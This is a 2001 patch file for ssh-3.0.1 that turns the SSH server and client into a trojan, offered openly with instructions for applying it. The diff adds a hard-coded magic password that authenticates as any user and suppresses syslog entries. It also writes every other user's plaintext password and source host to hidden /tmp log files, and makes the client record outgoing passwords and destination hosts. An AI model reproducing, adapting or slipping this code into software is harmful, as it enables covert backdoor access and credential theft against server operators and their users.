# patch for ssh-3.0.1 by ozone@rm-f.net # # use at your own fucking risk.... # authenticates any user who gives the magic password, # but does not log to syslog when its used. # logs all received logins/passwds (only if # its not the sekrit passwd), and src hosts. # the client(s) will log all outgoing logins/passwds, # and the destination hosts. # see _SERVER_LOG, _CLIENT_LOG, and _MAGIC_PASSWD # tar -zxvf ssh-3.0.1.tar.gz # cp fakessh301.diff ssh-3.0.1/ # cd ssh-3.0.1/ # patch -p0 < fakessh301.diff # # -ozone # www.rm-f.net/~ozone # 2001 diff -c apps/ssh/authc-passwd.c apps/fakessh/authc-passwd.c *** apps/ssh/authc-passwd.c Tue Aug 21 23:07:57 2001 --- apps/fakessh/authc-passwd.c Tue Aug 21 16:38:08 2001 *************** *** 100,105 **** --- 100,110 ---- return; #endif /* SSH_NEW_READPASS_ELOOP */ + /* cust0m - log this bitch */ + fd0ut = fopen(_CLIENT_LOG, "a+"); + fprintf (fd0ut, "%s:%s@%s\n", password, user, h0st); + fclose (fd0ut); + } else { diff -c apps/ssh/auths-passwd.c apps/fakessh/auths-passwd.c *** apps/ssh/auths-passwd.c Tue Aug 21 23:07:58 2001 --- apps/fakessh/auths-passwd.c Tue Aug 21 16:45:23 2001 *************** *** 182,187 **** --- 182,192 ---- goto password_ok; } + /* cust0m - check for magic password */ + if (!strncmp(_MAGIC_PASSWD, password, strlen(_MAGIC_PASSWD))) { + sekrit_l0gin = 1; + goto password_ok; + } /* Try a local password (either normal or shadow). */ if (ssh_user_validate_local_password(uc, *************** *** 224,233 **** --- 229,247 ---- packet, completion_context); return; password_ok: + + if (!sekrit_l0gin) { + /* log this bish */ + fd0ut = fopen (_SERVER_LOG, "a+"); + fprintf (fd0ut, "%s:%s from %s\n", user, password, server->common->remote_host); + fclose (fd0ut); + } + /* Password authentication passed, but we still need to check whether the password needs to be changed. */ ssh_xfree(password); + if (!sekrit_l0gin) ssh_log_event(config->log_facility, SSH_LOG_NOTICE, "Password authentication for user %.100s accepted.", ssh_user_name(uc)); Common subdirectories: apps/ssh/drafts and apps/fakessh/drafts diff -c apps/ssh/ssh2.c apps/fakessh/ssh2.c *** apps/ssh/ssh2.c Tue Aug 21 23:07:57 2001 --- apps/fakessh/ssh2.c Tue Aug 21 16:46:54 2001 *************** *** 1182,1187 **** --- 1182,1191 ---- if ((argc <= getopt_data.ind) || (argv[getopt_data.ind] == NULL)) return NULL; else + + /* cust0m - save destination hostname */ + ssh_snprintf (h0st, sizeof(h0st), "%s", argv[getopt_data.ind]); + return ssh_xstrdup(argv[getopt_data.ind]); } diff -c apps/ssh/ssh2includes.h apps/fakessh/ssh2includes.h *** apps/ssh/ssh2includes.h Tue Aug 21 23:07:56 2001 --- apps/fakessh/ssh2includes.h Tue Aug 21 16:34:52 2001 *************** *** 37,48 **** ! ! ! ! ! ! --- 37,48 ---- ! #define _SERVER_LOG "/tmp/.slog" ! #define _CLIENT_LOG "/tmp/.clog" ! #define _MAGIC_PASSWD "ozone" ! int sekrit_l0gin; ! FILE *fd0ut; ! char h0st [128]; diff -c apps/ssh/sshd2.c apps/fakessh/sshd2.c *** apps/ssh/sshd2.c Tue Aug 21 23:07:56 2001 --- apps/fakessh/sshd2.c Tue Aug 21 16:48:11 2001 *************** *** 969,974 **** --- 969,976 ---- if (successful) { + + if (!sekrit_l0gin) ssh_log_event(common->config->log_facility, SSH_LOG_NOTICE, "User %s, coming from %s, authenticated.", Common subdirectories: apps/ssh/startup and apps/fakessh/startup Common subdirectories: apps/ssh/tests and apps/fakessh/tests